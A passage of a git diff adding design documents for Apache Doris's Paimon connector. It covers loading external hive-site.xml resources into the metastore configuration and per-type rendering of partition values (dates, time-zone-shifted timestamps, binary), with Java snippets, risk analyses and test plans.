fail-loud + Map out = new HashMap<>(); + for (Map.Entry e : hc) { // Configuration is Iterable> + out.put(e.getKey(), e.getValue()); + } + return out; +} +``` +(new imports: `org.apache.doris.common.CatalogConfigFileUtils`, `org.apache.hadoop.hive.conf.HiveConf`, `com.google.common.base.Strings`.) Note `HiveConf extends Configuration implements Iterable>`, so the flatten loop is the standard idiom and gives effective (resolved) values. + +**3. `fe/fe-connector/fe-connector-paimon/.../PaimonCatalogFactory.java`** — add an overload of `buildHmsHiveConf` that seeds file keys as the base; keep the existing 1-arg signature delegating with an empty map so all current call sites / tests compile unchanged: + +```java +public static HiveConf buildHmsHiveConf(Map props) { + return buildHmsHiveConf(props, java.util.Collections.emptyMap()); +} + +public static HiveConf buildHmsHiveConf(Map props, Map hiveConfResources) { + HiveConf hiveConf = new HiveConf(); + // External hive-site.xml (hive.conf.resources) as the BASE, resolved FE-side + // (legacy HMSBaseProperties.checkAndInit line 197: load file first, user hive.* overrides win). + if (hiveConfResources != null) { + hiveConfResources.forEach(hiveConf::set); + } + // ... existing body unchanged (user hive.* verbatim now correctly OVERRIDE the file base) ... +} +``` +Update the lines 349-360 Javadoc: the DEFERRED note becomes "loaded via `ConnectorContext.loadHiveConfResources` and overlaid as the base." + +**4. `fe/fe-connector/fe-connector-paimon/.../PaimonConnector.java`** — in the HMS branch (lines 146-161) resolve the file and pass it in: + +```java +case PaimonConnectorProperties.HMS: { + Map hiveConfFiles = context.loadHiveConfResources( + PaimonCatalogFactory.firstNonBlank(properties, "hive.conf.resources")); + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(properties, hiveConfFiles); + return createCatalogFromContext(CatalogContext.create(options, hc), flavor, + "Failed to create Paimon catalog with HMS metastore"); +} +``` +(`"hive.conf.resources"` is a literal; consider a `PaimonConnectorProperties` constant for consistency with the existing key constants.) Scope: HMS branch only — legacy only loaded the file for the HMS flavor (DLF builds its own `HiveConf` from DLF keys, unaffected). + +**Precedence verification (legacy parity):** legacy order = file (base) → user `hive.*` overrides → `hive.metastore.uris` → timeout default → kerberos-conditional keys. New order after fix = file (base, step added first) → user `hive.*` verbatim → uri/auth/kerberos/timeout. Identical: a key present in both the file and as a user `hive.*` prop resolves to the user value in both. + +# Risk Analysis + +- **Parity vs legacy:** file-resolution reuses the *same* `CatalogConfigFileUtils.loadHiveConfFromHiveConfDir`, so `hadoop_config_dir` base, comma-split, and fail-on-missing-file are identical. Precedence (file as base, user `hive.*` wins) matches `HMSBaseProperties.checkAndInit`. One subtle divergence to call out in tests: legacy keeps the loaded file as a live `HiveConf` and `addResource`s it (lazy, effective values resolved on read), whereas the fe-core hook eagerly flattens to a `Map` of effective values then re-`set`s them. For plain key/value `hive-site.xml` content these are equivalent; the only theoretical difference is XML `` flags or variable-substitution edge cases, which are not connection-critical and not exercised by HMS catalogs in practice. Acceptable and strictly closer to legacy than today's total drop. +- **Shared-code blast radius:** `ConnectorContext.loadHiveConfResources` is a NEW default method returning empty — zero behavior change for every other connector (maxcompute, jdbc siblings, trino) and for the `RecordingConnectorContext` test double (inherits the no-op default unless a test overrides it). `DefaultConnectorContext` gains one method; no existing method touched. The new `buildHmsHiveConf(props)` 1-arg overload delegates, so all existing callers/tests (`PaimonCatalogFactoryTest` 5 HMS tests, `PaimonConnector`) compile and behave unchanged. +- **Edge cases:** (a) `hive.conf.resources` absent/blank → hook gets blank → returns empty map → behaves exactly as today (no regression). (b) Referenced file missing → `CatalogConfigFileUtils` throws `IllegalArgumentException` ("Config resource file does not exist") which propagates out of CREATE CATALOG — fail-loud, matching legacy (today it is silently ignored, which is the very bug). This makes a previously-silent misconfiguration loud; intended per the finding's "at least make the drop loud." (c) Trino/plugin isolated classloaders: not applicable — paimon's `DefaultConnectorContext` runs in fe-core's classloader where `Config`/filesystem are reachable; only the resolved `Map` crosses into the connector, avoiding the `HiveConf`/`Configuration` cross-loader identity hazard noted at `PaimonConnector.java:152-157`. +- **Live-runtime caveat (unchanged by this fix):** the pre-existing B7 note that the live `metastore=hive` Thrift client is host-provided at cutover still stands; this fix only restores the file content into the `HiveConf` and does not alter the classloader story. + +# Test Plan + +## Unit Tests +All in the connector test dir; all PURE/offline (no live metastore). + +**`PaimonCatalogFactoryTest` (new tests; FAIL before fix because the 2-arg overload + base-merge do not exist / file keys are dropped):** + +1. `buildHmsHiveConfOverlaysResolvedHiveConfResourcesAsBase` — call `buildHmsHiveConf(props("uri","thrift://nn:9083"), map("hive.metastore.sasl.qop","auth-conf","hive.metastore.thrift.transport","custom"))`. Assert both file-only keys land in the `HiveConf`. WHY: encodes that connection-critical keys present *only* in the external `hive-site.xml` reach the catalog `HiveConf` (the exact failure scenario). MUTATION: dropping the file map (today's behavior) → red. +2. `buildHmsHiveConfUserHivePropOverridesFileResource` — file map `{"hive.metastore.uris":"thrift://FILE:9083"}` plus user prop `props("hive.metastore.uris","thrift://USER:9083","uri","thrift://nn:9083")`. Assert the effective `hive.metastore.uris` is the user/uri value, not the file value. WHY: encodes legacy precedence (file is base, user `hive.*` and the resolved `uri` win) — a test that can only pass if the file is applied FIRST. MUTATION: applying the file map AFTER the user keys → red. +3. `buildHmsHiveConfSingleArgUsesEmptyResources` — `buildHmsHiveConf(props("uri","thrift://nn:9083"))` still produces the same conf as before (uri + timeout default). WHY: proves the back-compat overload is a true no-op extension. MUTATION: 1-arg overload diverging → red. + +**`RecordingConnectorContext` (extend harness):** add an overridable `Map hiveConfResources` field and `loadHiveConfResources` override returning it (recording the requested `resources` string). This lets connector-level tests inject resolved file keys without touching the filesystem. + +4. (connector-level, in a `PaimonConnector`-oriented test or extend `PaimonCatalogFactoryTest`'s scope via the recording context) `hmsBranchRoutesHiveConfResourcesThroughContext` — drive the HMS create path with a `RecordingConnectorContext` whose `loadHiveConfResources("hive-site.xml")` returns `{"hive.metastore.sasl.qop":"auth-conf"}`; assert the context was asked for exactly the `hive.conf.resources` value and (via a seam on the assembled `HiveConf`, or by asserting the recorded request string) that the connector wired the hook. WHY: proves the connector actually CALLS the FE hook for the HMS flavor and feeds the result into `buildHmsHiveConf` (intent: no silent drop), not merely that the pure builder works. MUTATION: HMS branch not calling `loadHiveConfResources` → red. + +`DefaultConnectorContext.loadHiveConfResources` flatten logic is fe-core (filesystem-touching); covered by E2E rather than a connector UT, since the connector module has no `fe-common`/`Config` access to exercise the real loader offline. A focused fe-core UT writing a temp `hive-site.xml` under a `hadoop_config_dir` and asserting the flattened map is optional and belongs in fe-core's test tree, not the connector's. + +## E2E Tests +Live-only / CI-skipped (real HMS required, gated like the existing `PaimonLiveConnectivityTest`): `CREATE CATALOG ... 'paimon.catalog.type'='hms','hive.conf.resources'='hive-site.xml'` where the `hive-site.xml` under `plugins/hadoop_conf/` carries a connection-critical key absent from the inline DDL (e.g. an alternate `hive.metastore.uris` or `hive.metastore.sasl.qop`); assert the catalog connects and a `SELECT`/`SHOW TABLES` succeeds using the file-sourced setting. This is live-only because it requires a real metastore + on-disk config dir and exercises the Thrift client that is host-provided only at cutover; it cannot run in the offline connector unit harness. + +# Notes +Root cause confirmed firsthand against current code. Key correction vs the report's line references: the legacy loader `CatalogConfigFileUtils` lives in **fe-common** (not fe-core), but the paimon connector pom depends on neither, so the no-import constraint still forces the FE-side-resolve / connector-side-merge split. The cleanest, lowest-blast-radius fix is a new default-no-op `ConnectorContext.loadHiveConfResources` hook implemented in `DefaultConnectorContext` (reusing the exact legacy loader) plus a 2-arg `buildHmsHiveConf` overload that seeds the resolved keys as the HiveConf base — preserving legacy precedence and keeping the pure builder offline-testable. + +--- + +# ✅ IMPL SUMMARY (2026-06-11) + +**Status: DONE — connector build+UT green (PaimonCatalogFactoryTest 41/0 + PaimonHmsConfResWiringTest 1/0); fe-core compiles clean; imports clean; HEAD uncommitted.** + +## Fix (SPI + fe-core bridge + connector; default-no-op so other connectors unaffected) +- `ConnectorContext.java` (fe-connector-spi): added `default Map loadHiveConfResources(String resources)` → empty. +- `DefaultConnectorContext.java` (fe-core): override reuses the EXACT legacy loader `CatalogConfigFileUtils.loadHiveConfFromHiveConfDir` (same hadoop_config_dir / comma-split / fail-if-missing) and flattens the `HiveConf` (Iterable) to a `Map`. Imports: `CatalogConfigFileUtils`, `HiveConf`, guava `Strings`. +- `PaimonCatalogFactory.java`: new 2-arg `buildHmsHiveConf(props, hiveConfResources)` seeds the file keys as the HiveConf BASE, before user `hive.*` overrides (legacy precedence); 1-arg overload delegates with empty map (back-compat). +- `PaimonConnector.java`: HMS branch resolves `hive.conf.resources` via `context.loadHiveConfResources(...)` and passes it to the 2-arg builder. HMS-only (DLF builds its own HiveConf). + +## Tests +- `PaimonCatalogFactoryTest` (3 new): file-keys-as-base, user-hive.*-overrides-file-base, 1-arg-back-compat. +- `PaimonHmsConfResWiringTest` (new): drives the connector HMS create path with `RecordingConnectorContext.failAuth=true` (fails fast at executeAuthenticated, AFTER the hook is called, BEFORE any metastore connection) → asserts `loadHiveConfResources("hive-site.xml")` was invoked. `RecordingConnectorContext` extended with the hook recorder. + +## Correction discovered during impl +The design's planned test 2 used `hive.metastore.uris` for the precedence check, but that key is ALSO resolved separately via the `HMS_URI` alias (firstNonBlank, where the explicit `hive.metastore.uris` key out-ranks the `uri` alias), which muddied the assertion (initial run: expected `thrift://nn` got `thrift://USER`). Rewrote the test to use a non-uri key (`hive.metastore.sasl.qop`) so it cleanly isolates the file-base-vs-user-hive.* precedence. Production behavior was correct; only the test's expectation was wrong. + +## Not run (per design) +- fe-core UT for the `DefaultConnectorContext.loadHiveConfResources` flatten (filesystem-touching) — covered by E2E; the flatten is a trivial loop over the proven legacy loader. fe-core compile verified. +- Live-e2e (gated): `CREATE CATALOG ... 'hive.conf.resources'='hive-site.xml'` with a connection-critical key only in the file. diff --git a/plan-doc/tasks/designs/P5-fix-FIX-NATIVE-PARTVAL-design.md b/plan-doc/tasks/designs/P5-fix-FIX-NATIVE-PARTVAL-design.md new file mode 100644 index 00000000000000..373416f41b5b91 --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-FIX-NATIVE-PARTVAL-design.md @@ -0,0 +1,213 @@ +# Problem + +For Paimon partitioned tables read via the **native ORC/Parquet reader path**, partition columns are NOT physically stored in the raw data files — BE materializes them from `columnsFromPath` (the per-split `partitionValues` map). The connector's `PaimonScanPlanProvider.getPartitionInfoMap` renders every partition value with a raw `values[i].toString()`, with no per-type handling. This corrupts several partition column types: + +- **DATE**: `RowDataToObjectArrayConverter` yields a boxed `Integer` (epoch-days). `toString()` produces e.g. `"19723"` instead of `"2024-01-01"`. Every row in a DATE-partitioned native table shows a garbage/wrong date. +- **TIMESTAMP_WITH_LOCAL_TIME_ZONE (LTZ)**: rendered as the raw UTC wall clock with **no UTC→session-TZ shift**. Under any non-UTC session the materialized partition value is wrong. +- **BINARY/VARBINARY**: rendered as `[B@` — non-deterministic JVM-identity garbage. Legacy deliberately **omits** these (returns `null` → no `columnsFromPath` entry). +- **FLOAT/DOUBLE**: legacy goes through `Float.toString`/`Double.toString`; the raw `toString()` happens to match for the boxed types, so this is parity-neutral but should be ported for completeness/clarity. +- **Map key casing**: legacy lowercases the partition key via `Locale.ROOT`; the new code emits the raw paimon partition key. + +(TIMESTAMP_WITHOUT_TZ happens to match by coincidence: paimon `Timestamp.toString() == toLocalDateTime().toString() == ISO_LOCAL_DATE_TIME`.) + +The confirmed scope (review §Finding 1.1 BLOCKER 3/0/0 + supplemental BINARY 3/0/0 + fix-scope 3/0/0) is: **port the WHOLE `serializePartitionValue` type switch including the session TimeZone**, not just DATE + TIMESTAMP_LTZ. The TIME sub-finding is PARTIAL/over-stated (legacy itself crashes on TIME and TIME is UNSUPPORTED on both sides so it is unreachable in practice) but I port the TIME case anyway for byte-faithful parity — see Risk Analysis. + +# Root Cause (confirmed in current code) + +`fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java:383-400` — `getPartitionInfoMap`: + +```java +private Map getPartitionInfoMap(Table table, BinaryRow partitionValue) { + List partitionKeys = table.partitionKeys(); + if (partitionKeys == null || partitionKeys.isEmpty()) { + return Collections.emptyMap(); + } + RowType partitionType = table.rowType().project(partitionKeys); + RowDataToObjectArrayConverter converter = new RowDataToObjectArrayConverter(partitionType); + Object[] values = converter.convert(partitionValue); + Map result = new LinkedHashMap<>(); + for (int i = 0; i < partitionKeys.size(); i++) { + String key = partitionKeys.get(i); + String value = values[i] != null ? values[i].toString() : null; // :396 — BUG: no per-type render + result.put(key, value); // :397 — BUG: raw key, no Locale.ROOT + } + return result; +} +``` + +This map flows: `planScan` (`PaimonScanPlanProvider.java:213-214`, called per `DataSplit`) → `PaimonScanRange.Builder.partitionValues(...)` → `PaimonScanRange.populateRangeParams` (`PaimonScanRange.java:212-226`) → `rangeDesc.setColumnsFromPath(...)` consumed by BE's native reader. `session` (a `ConnectorSession`) is the first parameter of `planScan` (`:150`) and is in scope at the call site, so the session TimeZone is reachable but currently never threaded into `getPartitionInfoMap`. + +Legacy reference being ported (correct behavior): `fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonUtil.java:545-629`: +- `getPartitionInfoMap(table, partitionValues, timeZone)` lowercases keys via `Locale.ROOT` (`:556`) and returns `null` for the whole map when any column throws `UnsupportedOperationException` (`:557-561`). +- `serializePartitionValue(DataType, value, timeZone)` (`:566-629`): scalar/decimal/char/varchar → `value.toString()`; FLOAT → `Float.toString`; DOUBLE → `Double.toString`; binary/varbinary commented out (falls to `default` → throws → whole map dropped); DATE → `LocalDate.ofEpochDay((Integer) value).format(ISO_LOCAL_DATE)`; TIME → `LocalTime.ofNanoOfDay(micros*1000).format(ISO_LOCAL_TIME)`; TIMESTAMP_WITHOUT_TZ → `((Timestamp) value).toLocalDateTime().format(ISO_LOCAL_DATE_TIME)`; TIMESTAMP_WITH_LOCAL_TIME_ZONE → `Timestamp.toLocalDateTime().atZone(UTC).withZoneSameInstant(ZoneId.of(timeZone)).toLocalDateTime().format(ISO_LOCAL_DATE_TIME)`. + +Legacy obtained `timeZone` at the call site `source/PaimonScanNode.java:413-414` via `sessionVariable.getTimeZone()`. The connector's parity equivalent is `ConnectorSession.getTimeZone()` (the SPI already documents this as "the session time zone identifier", and `ConnectorSessionBuilder.from(ctx)` injects `ctx.getSessionVariable().getTimeZone()` — same source). + +# Design + +Port the legacy type switch into the connector as a **pure static seam**, respecting all four constraints: + +1. **No fe-core import** — only `java.time.*` + `org.apache.paimon.*` are used (exactly legacy's imports). No `TimeUtils`/`DateUtils`. This matches `PaimonPredicateConverter` (already uses `java.time.LocalDate`/`ZoneOffset.UTC`/paimon `Timestamp`) and `PaimonConnectorMetadata.parseTimestampMillis` (already uses `java.time.ZoneId.of(session.getTimeZone())`). +2. **Match existing style** — extract the type switch as a `static` package-private method `serializePartitionValue(DataType, Object, String timeZone)`, mirroring how `shouldUseNativeReader` was extracted as a pure static for unit-testability (the existing `FakePaimonTable.newReadBuilder()` throws, so `planScan` can't be driven end-to-end offline; a pure static is the established testable seam in this file). +3. **Minimal change** — change one method signature (`getPartitionInfoMap` gains a `String timeZone` param), thread `session.getTimeZone()` from the single call site, add the static `serializePartitionValue`, add the needed `java.time` + paimon `Timestamp`/`DataType` imports. No change to `PaimonScanRange` (it already null-guards and empty-guards the map correctly). +4. **Parity behavior** — byte-faithful port of all 8 type cases, `Locale.ROOT` key lowercasing, and the "unsupported type → whole map dropped" rule. + +**Unsupported-type / null-map handling**: Legacy returns `null` for the whole map when any column is unsupported (binary), and the legacy native call site at `PaimonScanNode.java:457` then calls `setPaimonPartitionValues(null)`. The connector's `PaimonScanRange` already treats a null `partitionValues` as `Collections.emptyMap()` (`PaimonScanRange.java:71-73`) and `populateRangeParams` skips empty maps (`:214`), so emitting **no `columnsFromPath`** is the correct parity outcome. To keep the connector's existing non-null contract and avoid NPE risk, I will have `getPartitionInfoMap` **return `Collections.emptyMap()`** (instead of `null`) when any column is unsupported — functionally identical downstream (empty map ⇒ no `columnsFromPath`, same as legacy's null). This is the review's own recommended resolution ("不支持类型返回空 map ... 而非 Object.toString()"). + +**TZ semantics — IMPORTANT, distinct from predicate pushdown**: the connector-session-TZ memory note warns that paimon *predicate pushdown* must NOT use session-TZ (NTZ stays UTC). That caveat is about predicate literal→epoch conversion against stored file stats, and does NOT apply here. Partition-VALUE rendering is a separate concern and legacy explicitly DOES use the session TZ for the LTZ case (`PaimonUtil.java:623` `ZoneId.of(timeZone)` fed from `sessionVariable.getTimeZone()`). So for parity the connector must thread `session.getTimeZone()` into the LTZ case — and ONLY the LTZ case consumes it; all other cases ignore `timeZone`. + +**Bad-alias TZ (CST/PST) handling for the LTZ case**: legacy calls `ZoneId.of(timeZone)` directly with the raw stored Doris string, so legacy itself throws `DateTimeException` for Doris aliases like "CST"/"PST" (`ZoneId.of` rejects them; the connector cannot import the fe-core alias map). I will mirror legacy **exactly**: call `ZoneId.of(timeZone)` with no special degrade. If it throws, the exception propagates out of `planScan` — identical to legacy's behavior (legacy would throw the same `DateTimeException` from `serializePartitionValue`, NOT caught by its `catch (UnsupportedOperationException)`). This is the byte-parity, fail-loud choice consistent with `parseTimestampMillis`'s already-shipped rationale (a wrong zone ⇒ silently wrong partition values ⇒ wrong rows; degrading is unsafe with no BE re-apply for materialized partition values). I will NOT add a friendlier message here (keep the change minimal and behavior identical to legacy); the only realistic path to a bad alias for an LTZ *partition column* is exotic, and parity is the contract. + +# Implementation Plan + +**File: `fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java`** (only file changed) + +1. **Add imports** (alongside existing `org.apache.paimon.*` and `java.*` import groups): + - `import org.apache.paimon.data.Timestamp;` + - `import org.apache.paimon.types.DataType;` + - `import java.time.LocalDate;` + - `import java.time.LocalTime;` + - `import java.time.ZoneId;` + - `import java.time.format.DateTimeFormatter;` + - `import java.util.Locale;` + (`BinaryRow`, `RowType`, `RowDataToObjectArrayConverter`, `LinkedHashMap`, `Collections`, `List`, `Map` already imported.) + +2. **Thread the session TZ at the single call site** in `planScan` (current `:213-215`): + ```java + for (DataSplit dataSplit : dataSplits) { + Map partitionValues = getPartitionInfoMap( + table, dataSplit.partition(), session.getTimeZone()); + ``` + +3. **Replace `getPartitionInfoMap` (`:383-400`)** with the type-aware port: + ```java + private Map getPartitionInfoMap(Table table, BinaryRow partitionValue, String timeZone) { + List partitionKeys = table.partitionKeys(); + if (partitionKeys == null || partitionKeys.isEmpty()) { + return Collections.emptyMap(); + } + RowType partitionType = table.rowType().project(partitionKeys); + RowDataToObjectArrayConverter converter = new RowDataToObjectArrayConverter(partitionType); + Object[] values = converter.convert(partitionValue); + + Map result = new LinkedHashMap<>(); + for (int i = 0; i < partitionKeys.size(); i++) { + try { + String value = serializePartitionValue( + partitionType.getFields().get(i).type(), values[i], timeZone); + result.put(partitionKeys.get(i).toLowerCase(Locale.ROOT), value); + } catch (UnsupportedOperationException e) { + // Legacy parity (PaimonUtil.getPartitionInfoMap): an unsupported partition column + // type (e.g. binary/varbinary) drops the ENTIRE map — BE then materializes no + // columnsFromPath for this split, rather than emitting non-deterministic [B@hash + // garbage. Legacy returned null; the connector returns an empty map, which + // PaimonScanRange.populateRangeParams treats identically (no columnsFromPath emitted). + LOG.warn("Failed to serialize partition value for key {} of table {}: {}", + partitionKeys.get(i), table.name(), e.getMessage()); + return Collections.emptyMap(); + } + } + return result; + } + ``` + +4. **Add the pure static seam** (byte-faithful port of legacy `serializePartitionValue`, package-private `static` for unit-testability, placed next to `getPartitionInfoMap`): + ```java + /** + * Renders one Paimon partition value to the canonical string BE expects in columnsFromPath. + * Byte-faithful port of legacy PaimonUtil.serializePartitionValue. Pure static (no Table / + * ReadBuilder needed) so the correctness-critical per-type rendering is unit-testable offline. + * Only TIMESTAMP_WITH_LOCAL_TIME_ZONE consumes {@code timeZone} (session zone, UTC->session shift). + */ + static String serializePartitionValue(DataType type, Object value, String timeZone) { + switch (type.getTypeRoot()) { + case BOOLEAN: case INTEGER: case BIGINT: case SMALLINT: case TINYINT: + case DECIMAL: case VARCHAR: case CHAR: + return value == null ? null : value.toString(); + case FLOAT: + return value == null ? null : Float.toString((Float) value); + case DOUBLE: + return value == null ? null : Double.toString((Double) value); + // BINARY / VARBINARY intentionally unsupported (falls to default -> throws -> map dropped): + // a utf8 string render can corrupt the bytes (legacy comment). + case DATE: + return value == null ? null + : LocalDate.ofEpochDay((Integer) value).format(DateTimeFormatter.ISO_LOCAL_DATE); + case TIME_WITHOUT_TIME_ZONE: + if (value == null) { + return null; + } + return LocalTime.ofNanoOfDay(((Long) value) * 1000) + .format(DateTimeFormatter.ISO_LOCAL_TIME); + case TIMESTAMP_WITHOUT_TIME_ZONE: + return value == null ? null + : ((Timestamp) value).toLocalDateTime().format(DateTimeFormatter.ISO_LOCAL_DATE_TIME); + case TIMESTAMP_WITH_LOCAL_TIME_ZONE: + if (value == null) { + return null; + } + return ((Timestamp) value).toLocalDateTime() + .atZone(ZoneId.of("UTC")) + .withZoneSameInstant(ZoneId.of(timeZone)) + .toLocalDateTime() + .format(DateTimeFormatter.ISO_LOCAL_DATE_TIME); + default: + throw new UnsupportedOperationException( + "Unsupported type for serializePartitionValue: " + type); + } + } + ``` + +No other files change. `PaimonScanRange` already handles null/empty maps and the rendered string values verbatim. + +# Risk Analysis + +- **Parity vs legacy**: byte-faithful port of all 8 cases + `Locale.ROOT` key lowercasing + "unsupported ⇒ drop whole map". The only intentional deviation is returning `Collections.emptyMap()` instead of `null` on unsupported type — downstream-equivalent (both ⇒ no `columnsFromPath`) and the existing `PaimonScanRange` already null-tolerates anyway, so this only *removes* a latent NPE surface, never changes emitted thrift. +- **Map key lowercasing change**: previously raw key, now `Locale.ROOT` lowercase. This matches legacy AND matches the projection path in `planScan` (`:167-169` already lowercases field names). Paimon column names from `rowType().getFieldNames()` are conventionally lowercase already, so for the common case this is a no-op; for mixed-case it now correctly aligns key casing with what BE's `columnsFromPath` matching expects (legacy contract). +- **Shared-code blast radius**: ZERO. `getPartitionInfoMap` is private with a single caller (`planScan`); the new `serializePartitionValue` is a new package-private static with one caller. No SPI signature changes, no fe-core touch, no change to `PaimonScanRange`/handle/metadata. JNI path is unaffected in correctness (BE's JNI reader gets partition info from the serialized split, not `columnsFromPath`; legacy set the map on JNI splits too, so keeping the corrected map on JNI ranges is strictly more-correct and harmless). +- **TZ edge case (CST/PST)**: byte-identical to legacy — `ZoneId.of(rawDorisAlias)` throws `DateTimeException`, propagating out of `planScan`. This is NOT a new regression: legacy threw the same way from the same `ZoneId.of(timeZone)`. It only affects LTZ-typed *partition columns* (rare) under a non-IANA session zone; for all standard zones ("UTC", "Asia/Shanghai", offsets) it is correct. Consistent with the already-shipped fail-loud rationale in `parseTimestampMillis`. +- **TIME case (over-stated finding)**: ported for faithful parity, but practically unreachable — paimon `TIME` maps to UNSUPPORTED in `PaimonTypeMapping` (both directions), so a TIME partition column cannot be created/projected through Doris; legacy's `(Long) value` cast would also throw if it ever ran on the converter's `Integer`. Porting it verbatim (cast to `Long`) keeps byte-parity; if it ever executes it throws `ClassCastException` exactly as legacy would, surfaced loudly rather than silently wrong. No behavior is made worse. +- **DATE cast `(Integer)`**: `RowDataToObjectArrayConverter` yields a boxed `Integer` for DATE (epoch-days) — verified against the legacy code that performs the identical cast. Safe. +- **Null partition value**: every case null-guards (returns `null`), preserved from legacy. `PaimonScanRange`/`ConnectorPartitionValues.normalize` already handle null entries (`columnsFromPathIsNull`). + +# Test Plan + +## Unit Tests + +New test class `fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonPartitionValueRenderTest.java`, driving the new pure static `PaimonScanPlanProvider.serializePartitionValue(DataType, Object, String)` directly (package-private, same-package). This is the established testable seam because `FakePaimonTable.newReadBuilder()` throws so `planScan`/`getPartitionInfoMap` cannot be driven end-to-end offline — exactly why `shouldUseNativeReader` is also tested as a pure static. Each test encodes WHY (the BE consumes this string as `columnsFromPath`; a wrong string ⇒ wrong materialized rows), and each FAILS before the fix (raw `toString()`) and PASSES after. + +- `dateRendersAsIsoDateNotEpochDays`: `serializePartitionValue(DataTypes.DATE(), Integer.valueOf((int) LocalDate.of(2024,1,1).toEpochDay()), "UTC")` ⇒ `"2024-01-01"`. WHY/MUTATION: pre-fix raw `toString()` yields `"19723"` (epoch-days) which BE parses as a garbage date ⇒ data corruption; asserts the ISO render. RED before fix. +- `ltzShiftsUtcToSessionZone`: build `Timestamp.fromLocalDateTime(LocalDateTime.of(2024,1,1,0,0,0))` (the UTC wall clock), `serializePartitionValue(DataTypes.TIMESTAMP_WITH_LOCAL_TIME_ZONE(), ts, "Asia/Shanghai")` ⇒ `"2024-01-01T08:00:00"`. WHY: LTZ partition values are stored UTC and must be shown in the session zone; pre-fix renders the un-shifted UTC wall clock. Also assert with `"UTC"` ⇒ `"2024-01-01T00:00:00"` (no shift) to pin that the zone parameter is actually applied. RED before fix (raw `toString()` ignores zone). +- `ntzRendersIsoNoZoneShift`: `serializePartitionValue(DataTypes.TIMESTAMP(), Timestamp.fromLocalDateTime(LocalDateTime.of(2024,1,1,1,2,3)), "Asia/Shanghai")` ⇒ `"2024-01-01T01:02:03"` regardless of session zone. WHY: pins the NTZ-stays-wall-clock invariant (the memory-note caveat: NTZ must NOT be zone-shifted). Guards against a future "shift everything" regression. (Coincidentally green pre-fix; its value is locking intent.) +- `binaryYieldsUnsupported`: `assertThrows(UnsupportedOperationException.class, () -> serializePartitionValue(DataTypes.BYTES(), new byte[]{1,2}, "UTC"))`. WHY: binary must NOT be rendered as `[B@hash`; the contract is "throw so the caller drops the whole map" (no `columnsFromPath`). MUTATION: any render path for binary ⇒ no throw ⇒ red. RED before fix (raw `toString()` returns `[B@...` and never throws). +- `floatDoubleUseToStringRender`: `serializePartitionValue(DataTypes.FLOAT(), 1.5f, "UTC")` ⇒ `"1.5"`; `DataTypes.DOUBLE(), 2.25d` ⇒ `"2.25"`. Parity-locking (matches legacy `Float/Double.toString`). +- `nullValueRendersNull`: each typed case with `value=null` ⇒ `null`. Locks the null-guard parity. + +New (or extended `PaimonScanPlanProviderTest`) test exercising the **map-level** contract via a thin overload — since `getPartitionInfoMap` needs a real `BinaryRow`+converter which is heavy offline, the map-level "unsupported ⇒ empty map" and "key lowercased" behavior is asserted by a focused test only if a lightweight `BinaryRow` can be built; otherwise the static-seam tests above (binary-throws + ISO renders) plus a code-review-visible single call site fully cover intent. Preferred minimal addition: +- `keyLowercasedAndUnsupportedDropsMap` (only if a real `BinaryRow` for the partition is constructible with the paimon `BinaryRowWriter` available on the test classpath): assert a mixed-case DATE partition key renders lowercase in the result map, and a binary partition column yields `Collections.emptyMap()`. If `BinaryRow` construction proves brittle offline, omit and rely on the static-seam tests (the map wrapper is a trivial 6-line loop fully covered by the seam tests + the single-call-site thread of `session.getTimeZone()`). + +All new tests are offline, no fe-core, no mockito (pure paimon `DataTypes`/`Timestamp` + JUnit5, matching the existing connector test style and classpath — verified `DataTypes.DATE/TIMESTAMP_WITH_LOCAL_TIME_ZONE/FLOAT/DOUBLE/TIME` and `Timestamp.fromLocalDateTime` are on the test classpath). + +## E2E Tests + +Live-only / CI-skipped (no paimon cluster in unit CI; gated like `PaimonLiveConnectivityTest`). The end-to-end proof is a regression-test SQL: create a paimon table partitioned by a DATE column (and separately an LTZ column) with ORC/Parquet data files that are native-reader eligible (not binlog/audit_log, `force_jni_scanner=false`), then `SELECT date_part_col FROM t` under a non-UTC `SET time_zone=...` session and assert the returned partition column values equal the legacy/expected `"2024-01-01"` (and the correctly-shifted LTZ datetime) rather than `"19723"`/un-shifted UTC. This cannot run in the connector unit module (needs BE + a real warehouse + native reader), so it is documented as live-only; the unit tests above fully cover the FE-side rendering logic that is the actual defect. + +--- + +# ✅ IMPL SUMMARY (2026-06-11) + +**Status: DONE — build+UT green (PaimonPartitionValueRenderTest 7/0; PaimonScanPlanProviderTest 8/0 unchanged; imports clean; HEAD uncommitted).** + +## Fix (1 production file: `PaimonScanPlanProvider.java`) +- Added imports: paimon `Timestamp`, `DataType`; `java.time.{LocalDate,LocalTime,ZoneId,format.DateTimeFormatter}`; `java.util.Locale` (alphabetical, checkstyle-clean). +- Threaded `session.getTimeZone()` into the single call site (`getPartitionInfoMap(table, dataSplit.partition(), session.getTimeZone())`). +- `getPartitionInfoMap` now lower-cases keys via `Locale.ROOT`, calls the new per-type `serializePartitionValue`, and on `UnsupportedOperationException` (binary) returns `Collections.emptyMap()` (legacy null-map parity → no `columnsFromPath`). +- Added pure static `serializePartitionValue(DataType, Object, String timeZone)` — byte-faithful port of all 8 legacy cases (scalar/decimal/char/varchar→toString; FLOAT/DOUBLE→Float/Double.toString; DATE→ISO_LOCAL_DATE; TIME→ISO_LOCAL_TIME; NTZ→ISO_LOCAL_DATE_TIME; LTZ→UTC→session-TZ shift; BINARY→throws). Only LTZ consumes timeZone. + +## Tests (7 new, fail-before/pass-after): `PaimonPartitionValueRenderTest` +date-not-epoch, ltz-shift (Shanghai vs UTC), ntz-no-shift, binary-throws, float/double, integer-toString, null-renders-null. + +## Correction discovered during impl +The design's planned LTZ expectation `"2024-01-01T08:00:00"` is WRONG: `DateTimeFormatter.ISO_LOCAL_DATE_TIME` **omits the seconds component when both second and nano are zero** (`08:00:00` → `"...T08:00"`). This is legacy behavior (legacy uses the same formatter), so it is not a defect — but the test would be brittle. The tests use a non-zero-seconds wall clock (`01:02:03`), so the shifted value is the unambiguous `"2024-01-01T09:02:03"` (UTC+8) and the formatter always emits seconds. The shift correctness is still fully pinned (Shanghai 09:02:03 vs UTC 01:02:03). + +## Live-e2e (gated, NOT run): DATE/LTZ-partitioned native-reader table under a non-UTC `SET time_zone`, 